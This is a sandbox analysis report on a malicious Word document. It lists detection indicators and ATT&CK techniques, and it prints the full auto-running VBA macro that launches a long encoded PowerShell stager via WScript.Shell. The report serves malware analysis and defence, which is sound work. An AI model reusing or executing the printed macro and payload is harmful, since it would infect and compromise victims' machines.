13272bdbbae69fddddb6e289f8bf603e
This report is generated from a file or URL submitted to this webservice on June 3rd 2021 18:03:12 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.48.7 © Hybrid Analysis
Incident Response
Risk Assessment
- Evasive
-
Found a reference to a WMI query string known to be used for VM detection
Possibly tries to implement anti-virtualization techniques
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 6
-
External Systems
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 28/64 Antivirus vendors marked sample as malicious (43% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 28/64 Antivirus vendors marked sample as malicious (43% detection rate)
- source
- External System
- relevance
- 8/10
-
Sample was identified as malicious by a large number of Antivirus engines
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
Document spawns new processes
-
Pattern Matching
-
YARA signature match
- details
-
YARA signature "Hacktool_Strings_p0wnedShell" matched file "all.bstring" as "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs" based on indicators: "Invoke-Mimikatz" (Reference: https://github.com/Cn33liz/p0wnedShell, Author: Florian Roth)
YARA signature "Bolonyokte" classified file "all.bstring" as "rat" based on indicators: "login,en ligne,Power" (Author: Jean-Philippe Teissier / @Jipe_) - source
- YARA Signature
- relevance
- 10/10
-
YARA signature match
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoClose" which indicates: "Runs when the Word document is closed"
- source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1137 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 4
-
Environment Awareness
-
Found a reference to a WMI query string known to be used for VM detection
- details
- "Win32_Process -> Vmtools, VBoxService (very tedious, not very effective!)" (Indicator: "win32_process"; File: "~WRS_432660EC-736E-4C2B-9F73-C88B5FB46D6A_.tmp")
- source
- File/Memory
- relevance
- 10/10
- ATT&CK ID
- T1047 (Show technique in the MITRE ATT&CK™ matrix)
-
Possibly tries to implement anti-virtualization techniques
- details
-
"Win32_Process -> Vmtools, VBoxService (very tedious, not very effective!)" (Indicator: "vbox")
"Win32_Process -> Vmtools, VBoxService (very tedious, not very effective!)" (Indicator: "vboxservice")
"Win32_Process -> Vmtools, VBoxService (very tedious, not very effective!)" (Indicator: "vmtools") - source
- File/Memory
- relevance
- 4/10
- ATT&CK ID
- T1497 (Show technique in the MITRE ATT&CK™ matrix)
-
Found a reference to a WMI query string known to be used for VM detection
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "ajanvrin520@beijaflore.com"
Pattern match: "jamarir817@beijaflore.com"
Pattern match: "domaine@cu2016.local"
Pattern match: "_fx@g7q.a"
Pattern match: "_gqw7g@hyrc8.odcylj"
Pattern match: "q@jv.dybehww"
Pattern match: "miteu@6u.ioc"
Pattern match: "vp@mph0.p4c"
Pattern match: "sl-us@s.ic3g"
Pattern match: "hus@s._"
Pattern match: "u@wp.qh"
Pattern match: "aor9@bni3i.o"
Pattern match: "mo@z6w.w"
Pattern match: "bl@_fwidfu.ztv2"
Pattern match: "sz@sr.s"
Pattern match: "e55s@q.j"
Pattern match: "t@w.g"
Pattern match: "ixus@n.el"
Pattern match: "w@.l8p.fhn5"
Pattern match: "k2-d9e@a.3" - source
- File/Memory
- relevance
- 3/10
- ATT&CK ID
- T1114 (Show technique in the MITRE ATT&CK™ matrix)
-
Found a potential E-Mail address in binary/memory
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "WScript.Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "PowerShell" which indicates: "May run PowerShell commands" - source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1204 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains embedded VBA macros with suspicious keywords
-
Informative 15
-
General
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "VBA/ThisDocument") has code: "Sub AutoClose()
B
End Sub
Public Function B() As Variant
Dim p As String
p = "powershell -noP -sta -w 1 -enc JgAoACAAJABFAE4Adg"
p = p + "A6AEMAbwBtAHMAUABlAEMAWwA0ACwAMQA1ACwAMgA1AF0ALQBq"
p = p + "AG8AaQBuACcAJwApACAAKAAgAE4AZQB3AC0AbwBiAEoAZQBDAF"
p = p + "QAIABJAE8ALgBjAG8ATQBQAFIAZQBTAFMAaQBPAG4ALgBkAEUA"
p = p + "ZgBsAEEAdABlAHMAVABSAGUAYQBtACgAIABbAHMAeQBTAFQAZQ"
p = p + "BtAC4AaQBvAC4ATQBlAG0AbwByAFkAUwBUAHIAZQBBAG0AXQAg"
p = p + "AFsAcwB5AHMAdABlAG0ALgBjAE8ATgB2AGUAcgB0AF0AOgA6AE"
p = p + "YAUgBvAE0AQgBhAFMAZQA2ADQAUwB0AHIAaQBOAEcAKAAgACcA"
p = p + "agBWAGkATABjAHQAcABLAEUAdgAyAFYASwBaAGUAegBnAG0AdQ"
p = p + "BzADQARwBlAGMAcwBOADYAdABRAFIASgBHAEQAZwBpAEMAaABC"
p = p + "ADkATABVAFIAawBaAHgAaQBCAGIAUwBKAFEAawBiAEIATgBIAC"
p = p + "8ANwA3AGQAUABTAFAAYgBkACsAdAB1ADcAVgBhAHEAegBEAHgA"
p = p + "NgBUAGoALwBtAGQARQA4AHIAYgBxAGYARwAyAE8ANwByADIAaA"
p = p + "BkAFgAegBrAGoANAAwAGMAQQBMAFEAdABHAE8AbgBkAEkAYwAr"
p = p + "AGwAZAB5AGwARQBlAHAAWgAvAGIARABoADAASABHADkAaABjAE"
p = p + "8ATwAyAEwAMQAxADkAMwBYAE0AMwBGADQAVwBEAEoAMgB6AHQA"
p = p + "ZwBrAGMAKwA2AG4ASgB2AGQAOQB1AGIAcQBMAHQAKwBhAEYAVQ"
p = p + "B3AFQAYgB0AFYATQBEAFMATQBQAGYANQBvAFUAMAAyAEoANgB4"
p = p + "AGcAdgBQAEcAbgBwAEUAWQBqAE8AMAB4AEkAMQB6AEkAbABVAH"
p = p + "cASwAzAEQARAA1AHAAawBoAFgAWQBSAEcAbABpAFcAbgBnADMA"
p = p + "cgBpAEkAWQBoAHIAawBCAHEAdgBYAHoAUgAyAEEANgA3AGgAUw"
p = p + "A5AE8AdwBkAEEASwB3AHgAWQB4AGIATwBsAG4ASgArAGsAYQBV"
p = p + "AGIAbABHAEwARwBlAHAAagBHAGsAWQBHAGoARwBSADMAYgArAG"
p = p + "sAcQBIAFYARAA5AEYARQBTAFUATABoAEcAbwBZAEgAcQAyAGcA"
p = p + "VwBXAGsAeQAzAE4AegBoAHoASQBpAGoARwBhADAAeQBvACsARQ"
p = p + "BYAFkAYQBFAGcAYwBhADAATwAvADEAcgBNAHYAYQA5AFYAbgBx"
p = p + "AEwAUABCACsATAByAFEAUQBrAHUANgB6AFYAMAA5AFkAcgAzAH"
p = p + "gAaABLAEUAUABEAEcATwBlADIAVwBkAHEAVQBNAFkAVABSAEsA"
p = p + "ZQBnAE0AWAArAEwASQB2AFcAWgBHAEgAUgBOAHUAcgBhAGgARA"
p = p + "BoAFYAdQBtAGEAUAB2AFgAUgBCAG0AdwBzAHcARgBHAHkAcABU"
p = p + "ADkAOAAwAFQAVwBwAHcAbAB2AFkAQQBvAEkAQwBCAEEAZQBmAH"
p = p + "gATwBKAHkAdQB6AEYAYgBIAGoAWQBYAHkAdABvAEsAWQBvAEEA"
p = p + "bwBuAEMAWgBXAE8AdQAxAGoAOQBTAGgAOQBEADkAQQBFAE0AUg"
p = p + "BBAGwARgBHAFkAUwBxAEMAQQAvAHQAQQBTAGkAVQBWAFgARABu"
p = p + "AHIATQBsAGEASAA0ADEAQwBoADEAUgA0ADIANABiAEMAMABCAE"
p = p + "MAUAAyAGkAeABFAEkAUQBSAG0AVgBCAFkAWgBqAHIASQBpAEMA"
p = p + "ZQA5AGkAWgBZAGwAMgByAEUAMgB4AE0ATgA0ADgAMAByADkAdQ"
p = p + "A4AHAAVABPAFEAcgBvAGwAWgBJAGQAUgB3AGYANwBaAFUAMgBS"
p = p + "AGcAcwA5AHgAOQBmAFIASwA4AFYAeABJAGIAcgBiAFEAWABPAD"
p = p + "EAWQBRAEQAUgBJAGYATABzAGgAegBSAHEANQBsADIAaQA0AHQA"
p = p + "OABHAHcANwB5AFkAdABSADUARgAwADAALwBGAHUALwBrAEgAMQ"
p = p + "B6ADAATAA0AEUAMgBlAG4AMAAyAHoAZgBQAGUAUQBZAGYARwBG"
p = p + "ADMANwA3AHUAcwBWAHcAcABsADgAUABxACsAUgBaAC8ALwBGAG"
p = p + "QASwBNAEsAQQBhAHYAdgAxAGMAagA5AFgAbwBxAHgAKwArAEIA"
p = p + "NwB2AGQARwBrAEsATABlADAAaQBZAFIAWgBvADgAdgBCAGEAOQ"
p = p + "BGAE0AUgBUAHkASwBLAGcAWgBEADgAZgBqAFIAUgBhAFQAawBT"
p = p + "AGMAbgBvAFMAQwBDAEgAOQBHADkARQBRAFUAdABJAEkAVwBxAH"
p = p + "MAbABoAFAAUwBXAFgAKwAvAEwAbgBXADkAMwBlAC8ATwA3AFUA"
p = p + "OQBFADcAQQAwAHMAMwB2AHUAcABWAFAAYQA1AFIAZgBIAHQAdQ"
p = p + "BwADQAVABjAFEATAA2AGkAcQBoACsAZQBsADgAOABoADUAbQBN"
p = p + "ACsATgBjAGgARwBRAE0AcABOAG8AdABrAEQAdgBNACsAegBhAE"
p = p + "4AWgBsAHUAWQBnAEIAQQB2AFgAeQBsAFYAbQB6AE4AUABuAFAA"
p = p + "RgBKAEQATwBnAFkANAA2AGIAUABNAEsAQgAyAE4ASgBZAEgATA"
p = p + "BPAEkAWQBUAHkAbABFAGcATABiAEQAWgB6AEoAeAAxAHoARwBj"
p = p + "AE8AaABYAGwAaQBkAGMATgBzAGUAdABBADgASQBWAGYAVQA3AE"
p = p + "IAUQBuAGEAbgBqAHkAcABkADYAWQArAEUARQBXAGUAWQB1AHAA"
p = p + "VwB2AGwANgBXAE0AZgBJAGEAKwByADEAbABQAEoAVQBSAHcASg"
p = p + "BEAFUAaABFAEYAZQBIAEsATwBPAFUAbABYAFUARABwAHgATABs"
p = p + "ADgAbgB2AHAAVwA1AHcAdwBEAGkAYgBYADIAZgA2AGoATABqAG"
p = p + "kASABpACsAZwA3AGUAagBIAEQARQBXAGkAbgBWAGgAcwBjAGwA"
p = p + "awBqAHIAZgA4AFYAawBTAGcAaABKAEEARQAxAEoARwBxAGgASw"
p = p + "BnAEsAbwBpAE0AdwBvACsATABsAHkAKwBJAHEANwBHADIAdwBQ"
p = p + "AGkAUQBiAEEAZgBXAGgAVQBXAFAAQQBzAC8AMwBCAEgAYgBDAH"
p = p + "UAWQBGAFkAYQA5ADYAUgBWAHUAQQBNAHYATgB5ACsAawBKADcA"
p = p + "TgBvAFoAbgBiAEQAZgBPAGsANwBCAGYAZwA1AGMAcABNAEYAMA"
p = p + "BMAHQAZQBCADMAYgAzAFoAZABGAE4ANQA3AGEAUQBIAFIARQBs"
p = p + "AEkAaQBwAGMAawBYAHIASQA5AGgAcgBiAG0AZABoAHgANwBLAD"
p = p + "cAVwBhAFYAYgBVAHgATQA2AGoAegBCAEkAWgBIAHgAMgBLAG4A"
p = p + "ZgBwADAAVABhAGEAeABIAFEAeAAvAHIAbQBvAGIAMwBCAHYAVA"
p = p + "AwAFoARQB2AHgAaAB1AGIARABEAGoARgB5AEIAMgBYAC8AaQBi"
p = p + "AEYAcwBNAGcAWQA3AFYALwBJAFkAcABpAHAAeQBnAEQARQB6AF"
p = p + "QAUgBoADgANwB6ADIASgBsAG4AUgBFAGcAOABZAHkAMwA0ADYA"
p = p + "MQB3AHUAYgBXAEYAMQA1AEEAOAA4AHEAcgBXAEIARwBwAGcASw"
p = p + "BiAHEASgBKAEgAeQB6AHQAcgBVAE8AQwBGAEsAMQBsAHYALwBV"
p = p + "ADkAZgBDAEEATwBDAEQAQQBZAFoAYQBLAEIAeQBRACsAZQBFAG"
p = p + "MAbwBOAEsAQgA2AFcATwBYAHYAMwBnAGkAOABwAFgAKwBrAHUA"
p = p + "RwA3AHEARwBaAHMAcQB2AEwAWgBEAEsAUABaAFkAMABrAGMAeA"
p = p + "BXAFcARABMAGkAagBUAEkAegBYAEkAQQArAGkALwA2AGUAWgBH"
p = p + "AEgARwB3AFUARAA4AG4AYQBDADgARwBCADIAegBWAHMAWQBJAG"
p = p + "oAcABLAEMANgBqAEwAdQAwAEkAbQAxAE0AWABsADEARgBXAFUA"
p = p + "RwBHAGIATQBJAFkAdwBtAC8AbwBVADcATwBpADUAcQBwAFgAYw"
p = p + "A2AGkAYwBJAE0AZQBNAEcAQgA0AFgAZwA5AE0AQwBYAEoASABV"
p = p + "AFMASABuAGUASQBIAGgAagA3AFAANwBIAEwAVwBHAHUAUAB2AH"
p = p + "YAdwBaAGgAcQAvADQASABZAFkAWABRADkARwBvAGsAcgBrAEEA"
p = p + "bwAyADkAagB6ADMANQByAEkANABaAFcAUQBxADYAOQBWADUARA"
p = p + "BFAFEAVgBlADMAegAyAFMAVgBIAGUAdABIAHUAQwBrAHEAQgB5"
p = p + "AEsAMQAzAHAAdwBqADkAYgBHAGcAMwBnACsAVgBDAEIANABxAE"
p = p + "4ANwBDAFYATQBJAHEAKwB5AGoAawBTAEgAZwBZAFAAZABWAEoA"
p = p + "TQBPAEQAWQBQAGoAUQBQAGsAdQAzADMAbwBaAG0AUQBtAFMAMw"
p = p + "B2AG8AeQBUAEMAOABnAC8AUwBLACsARQBVAFgAWgBIAE8ANQA1"
p = p + "AEEARgBiAGkATABjAFEAawBTAFkAQgBmAHQANABLAGYAZwBvAG"
p = p + "YAcABmAHEAMQB1AEEANgBVAE0ALwBSAEkAVAB5ADIAdABPAG0A"
p = p + "dgB3AHgAbABKAFEASwAwADYAVQBpADQAZAAwAHQAdQAzAFAAdw"
p = p + "B6AHoAUABGAGgAbQBHADYAaQBXAC8ARQA3ADQAYwAzAHAAQgBV"
p = p + "AEoASwB2AEkAQQBaADUANQBKAFAAWQBuAHUAbwA3AGsAagBiAG"
p = p + "gAYgArADQAeABQAEIAWABqAHkASgBYAGQAMQAyAFcAWQAyAEsA"
p = p + "TABuAGEARABjAG0AcQBPAGoAUQAvAEsANgBwAEEAYQA4AEwANQ"
p = p + "BKAEYAaQBVAEQAYwBrAG0AdABXAE0AYwBKAFgAcgBiAHMATgBV"
p = p + "AEsAVwBQAEUAcwBYAHEAUQA4AFEAVgBpAEUANQBlAHkAYwBMAH"
p = p + "IANwAyAHQANQAwAFIATQBmAEoAdQBKAGcATABlACsAVABrAE8A"
p = p + "ZQBuADQAUwB3ADIAWQBxAFoAaQBsAG0ASgA4AFEAcgA2AFgAZw"
p = p + "BpAGIAQwBoAGkAMgB2AEEAaABMAGQARgBEAHUANQBSAGcAegBK"
p = p + "AEIAUwBzAEMAaAAzAFYAYwAvAEUAcgA4AGsAQQBUAFoAZgBUAG"
p = p + "sAagB0ADIAeABhAEEAaQBVAEEAQQA1ADAAUwBuAEYAeQA2ADAA"
p = p + "egBIAEcAegA5AFMANgBCAHQAeQBwAEcAZwA4AEEAUgBzADYASQ"
p = p + "BUAGsAdwB4ADUAMwAyAHoAOQBoAFgAbABJAGEAYwBWAG0ANABq"
p = p + "AEYAWQBkAEMAZgBHAG8AdABNAEIAQgBvAFEAMgArAE8AWAA3AF"
p = p + "oARwBZAHUAbwBuADkASgBHAGcARgAwAFcAZwBnAG8AagAvAGMA"
p = p + "OQB2AG8AQwBWAHkAVQBqAGUAbwA5AEsAZQB2AFEAYQBsAEkAcA"
p = p + "BDAFcAQwBEAG8AOQB3AFMALwBLADYAcwAwAEcAdwBJADcAdQBT"
p = p + "AE4AdgBiAFEAawA2AG0AMAAxAHAAbABiAFAATwBsAGYAZABaAD"
p = p + "QAbgA1AHgAOABhAGIARAAzAFcAYgBPAEoAcwA2AGkAYQBmAGYA"
p = p + "awA0AE8ALwB2AFQAbgBuAFYARQBxAGkAWQA1AHQAcgBVAHIATQ"
p = p + "A5AHMAawBSAGIAUwBTAEoAbQB6AEwATABGADMAbgBNAG4AdQBL"
p = p + "AFoAagBJADMAVgAyAEcAVwBMADgATQBZAHYASgA2AGwANgB5AD"
p = p + "MANgAyAGsAYgBUAEcAcQB5AEoAagB0AEYAOQBDAG0AZgBFADUA"
p = p + "MgBLAGUANABYADAAMgAyAEMAbQBtAFEAOQBtAGEAKwBMAGUARQ"
p = p + "A2ADgAawBBAG4AZwA0AEMARwA2AFoAZwBaAFoAOABuAGYATwBG"
p = p + "AGsAZwBPAGUAOABEAEsARgBkAE8AVwBnADIAcgBVAEUAUwB1AE"
p = p + "0AbABZAGcAcgB0AE4AOQBQADEARQBuAEoANgBXADUANQBDAHkA"
p = p + "KwA0AFAAMgBBAHcAUwBZAEEAVgBUAGcAQQBKAFEAVABtAE4AZQ"
p = p + "B5AGIAZgBWAGMAbQBRAFEAVQBwAFQARgB4AHYAQQBZAEYAOABG"
p = p + "AGMAVQB4ACsASABuAEUAeABPAFQAcABhAGsAcgBOAE4AWQAvAD"
p = p + "QAMQBvAFQAVQB6ADEAeAArAEsANAB6AFQAKwBkAHoAdwBFADcA"
p = p + "TgBnADUAWQBxAFgAdABlAEQANgA5AFAAagBGAGcAdAAwAFQAWg"
p = p + "A5AEQAUgAvAC8ANQBpADkAbABzAFkAVwAzAE8AbgByADQAZABI"
p = p + "AEoAagBOAHUAagA3AEcAbwBFAFgASABNADQAKwBTAFgAVgBRAE"
p = p + "YAUwB2AGUASwArAEYANgByAC8AaQBnAFgAVABsAFoAQwBjADEA"
p = p + "MgBiAEIATQA1AE4AWQBUAHEASgBOAGIARABkADUAQQBMAGMASA"
p = p + "BpAGYAdQBMAEoAMQBMAGEATwBjAEMAZQBCAGUAagA1AEsASQBH"
p = p + "AFgAWgA3ADMASgBMAE0AQwBOAGoAdgBaAG8ATgA4AE8AZgBlAG"
p = p + "YAMAAyAEMAOAB5ADEAMQB0AGcAdwAyAE8ARQB2AE4AMwBrADMA"
p = p + "UgA5ADgAeAB2AG0AcABhAG0AdwBzADkATwB5AE0AVgAvADMAcA"
p = p + "BNAHgAWgBNADQANABYAGIAMgBnAHIAZQBYADYAZwA5AFkAMABP"
p = p + "AFcAYwBsAHYAMwBmAE4AeABUAEQAUgBZAC8ANQB0AFkAeAA5AD"
p = p + "MANQBnAHIAVAAzAEUAWQBmADgASABiAGYAQgBuAGIAcgB0ADgA"
p = p + "cwBPAEEAdgBxAE0AZQB3AGYAeQBEAFMAQQBhADUAaABOAG0ATQ"
p = p + "A2AFUANgBrAEwAawBKAGwAUQBSAGoANgBIADgAMQBXAGsAcQB2"
p = p + "ADkAbgArAHIAdQBRAGgAYQBtAGIANgBlAFUAYQBLAGwAWgBMAF"
p = p + "gANgBiAFoAZABmAGoAYwB5AFgAeABvAEcARwAzADEANQBUAFAA"
p = p + "TwBEAFYAVgB5ADQATwA4ACsAWAA5AEEASABGAEwAUQBrAHUANg"
p = p + "ArAGIAVQB0AGQAVABkAFgAQQA0AFMAbQArADIANwBCAHoAWQA1"
p = p + "AEEAZABPAG4AOQBnAEUARgBCAGoASgBIAHgAdgBwAEIAeABBAH"
p = p + "cAMgArAG0ARQBtADEANABCAGEAOABOAHMAOABMAEoAbAA3AHkA"
p = p + "bwBoAE8AMQArADIAcABwAFYASgBXADMAcABCAEYATQBZACsAbA"
p = p + "BSAHAAawBKAGUASQBBAGwAYQB6AE0AbQBUAHYAQQB2AEQAQwAy"
p = p + "ACsASwB6AHIASQBKAGkAOABEADgAZQA5AHcAcABQAEYAOAB5AE"
p = p + "IANwBmAEQAdgBhADgANwBIAFEAVQBFAEoARAB0AHkAZgBXAHcA"
p = p + "VABlAHgASABnADEAdQB0AHUAcgByADYAWQBNADIATABmAFkAZA"
p = p + "B3ADYATQAwAHIAYwB4AEEAdgBnAFMAbQA0ADgAMABHAGMAMwBp"
p = p + "AEEAUQBRAGYAMwBMAGQAZQBGAEQAaQBsAG8AMwB3AGEATwBEAD"
p = p + "UARwBZAGoATwByAEgARgArAE8AOQBmADUAWQBIAGwAbgBNAGIA"
p = p + "TAAwADgAUABIAC8ALwA0ADkAbgBOAHIAZAA0AFAAZgBnADcALw"
p = p + "BmAG4AegAzADgAdwA2AGgAYQA3AGgASAB3AGkAYwBIAG4AbABG"
p = p + "ADAAMgB0AEEANQBVAHgAawBkAGkANABaAGUAVQBEAFYAUgBOAG"
p = p + "0ANgBaADUAZQBBAEoAOQBaAHEAcwBhAC8ARwBhAGYANABOAEMA"
p = p + "RABrAHMAZgA4AHYAUwB6ADMAUwBIAGkAeQArAC8AcQB6AG4ATA"
p = p + "BJADkAQgBLAFAAeABKADMAagBFAFMAdABNAGEAYgBMAHgAZwB5"
p = p + "AHUAcQBmAEQAawA5AE8AQwBkAGIAWABrAGcAMAA5AGYAQwBqAH"
p = p + "gAUQAwAFUAagBYAE4ASgA2AEIAVgBhAFMALwAxAEMAYQBsAGQA"
p = p + "SwBvAEoASgBVAE0AUgAwAFQAVgBBAC8AYQBHAGkAegBXADkAcw"
p = p + "BnAG4ARwAzAFIASQBOAEkAWgB5AG8AbgBDAHEAaABkACsAMwBS"
p = p + "AHUALwBZAGwAYQBXAGYAcwBmAGQAcAA0AFAANABkAGgAKwBsAG"
p = p + "4AdQAzADcAMgBrAEcAZQAzAFgAUABtAHcAaABmAG4AVwBFADgA"
p = p + "SwBlAGwATQBsAGMAegBWAEkAWgB6AE8AUQBLAEcAMgByAGIANg"
p = p + "BUAEwATABTAFYASwBkAFQASgBJAG0AYgBOAFcATwBiAFgAUwA1"
p = p + "AG0AegAvAGsAVgBjAGIAMgBOAE8AYgBlAHgAZwB2AFkANQBjAH"
p = p + "YAaAB6ADcANwBpAE4AdgArAE0AYgBsAFcAbABYAHMANABlAHYA"
p = p + "bAA5ADAAZQBTAGMANABlAHoAOABMADQANgBZAGIAcgBiADYAUA"
p = p + "BqADQATQB5ACsAUABYADkALwBIAGkARgBnAFgAQQBTADgAeABK"
p = p + "AGcAcQBXACsAegBCAE4AWAB3AEwAZwBTAFYAaABFAEYASgAwAG"
p = p + "YASABoAFoAUwB2AEkAZwBLAFAARwBGAGoAcwBRAFYAeABRADcA"
p = p + "SQBFAEkAbwBnAEwAQwBkAHcAMgBVAGQAVABGAFgAeQBPAEMAKw"
p = p + "BmAHMARABYAFoAeQBiAEoAbwBnAFIAMgBNAHoAbABzAGwARgBz"
p = p + "AFoAeQAyADkAaQAvAFQASwBKAGwAWQB5ADMAQwBFAEwAdwB2AD"
p = p + "cARwAwAE4ANgB2AGMARwB4AG0AbABhAHgAaAA0AHgAZwA5AFAA"
p = p + "OABIAHYAMQAzAG4ANQB0ADgAPQAnACAAKQAgACwAIABbAFMAWQ"
p = p + "BzAHQAZQBNAC4ASQBPAC4AYwBvAG0AUAByAGUAcwBzAGkAbwBO"
p = p + "AC4AQwBPAG0AUAByAGUAcwBTAGkAbwBOAG0ATwBEAGUAXQA6AD"
p = p + "oARABlAGMATwBtAFAAUgBFAHMAUwAgACkAIAB8AEYAbwByAGUA"
p = p + "QQBDAEgAewAgAE4AZQB3AC0AbwBiAEoAZQBDAFQAIABTAFkAUw"
p = p + "BUAGUAbQAuAGkAbwAuAFMAdAByAEUAYQBNAHIARQBBAGQARQBS"
p = p + "ACgAIAAkAF8AIAAsACAAWwB0AGUAeAB0AC4AZQBuAEMATwBEAE"
p = p + "kAbgBHAF0AOgA6AEEAUwBDAEkASQApACAAfQApAC4AUgBlAGEA"
p = p + "ZAB0AG8AZQBuAEQAKAApACAA"
Set asd = CreateObject("WScript.Shell")
asd.Run (p)
End Function" - source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1204 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\msoFB27.tmp"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"Global\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Global\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001"
"Local\10MU_ACB10_S-1-5-5-0-70070"
"Local\ZonesLockedCacheCounterMutex"
"Local\10MU_ACBPIDS_S-1-5-5-0-70070"
"Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~_272bdbbae69fddddb6e289f8bf603e.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 61E20000
- source
- Loaded Module
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: " I#")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "NK#")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: ">F#")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
- Spawned process "powershell.exe" (Show Process)
- source
- Monitored Target
- relevance
- 3/10
-
Contains embedded VBA macros
-
Installation/Persistence
-
Chained signature (with api-8702...). Detects file write then load as module
- details
- Chained signature (with api-8702...). Detects file write then load as module
- source
- Loaded Module
- relevance
- 8/10
-
Dropped files
- details
-
"~_272bdbbae69fddddb6e289f8bf603e.doc" has type "data"
"13272bdbbae69fddddb6e289f8bf603e.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu Jun 3 16:04:52 2021 mtime=Thu Jun 3 16:04:52 2021 atime=Thu Jun 3 16:05:11 2021 length=2648707 window=hide"
"8627D596.png" has type "PNG image data 591 x 118 8-bit/color RGB non-interlaced"
"9CAAB221.png" has type "PNG image data 690 x 643 8-bit/color RGB non-interlaced"
"C19B2C8C.png" has type "PNG image data 1625 x 99 8-bit/color RGBA non-interlaced"
"MSO1036.acl" has type "data"
"D89612A0.png" has type "PNG image data 981 x 92 8-bit/color RGB non-interlaced"
"~WRS_432660EC-736E-4C2B-9F73-C88B5FB46D6A_.tmp" has type "data"
"37590EF7.png" has type "PNG image data 620 x 118 8-bit/color RGBA non-interlaced"
"A6C22666.png" has type "PNG image data 901 x 293 8-bit/color RGBA non-interlaced"
"931E972F.png" has type "PNG image data 412 x 81 8-bit/color RGB non-interlaced"
"79520336.png" has type "PNG image data 271 x 91 8-bit/color RGBA non-interlaced"
"1E34ECB4.png" has type "PNG image data 640 x 242 8-bit/color RGBA non-interlaced"
"99725241.png" has type "PNG image data 943 x 54 8-bit/color RGBA non-interlaced"
"24D0B1D.png" has type "PNG image data 749 x 197 8-bit/color RGBA non-interlaced"
"7D8D2667.png" has type "PNG image data 590 x 168 8-bit/color RGB non-interlaced"
"9C004E2D.png" has type "PNG image data 638 x 82 8-bit/color RGBA non-interlaced"
"index.dat" has type "data"
"13F74E14.png" has type "PNG image data 559 x 214 8-bit/color RGB non-interlaced"
"DEFA43B9.png" has type "PNG image data 490 x 325 8-bit/color RGBA non-interlaced" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.MSO\359B47DC.png"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
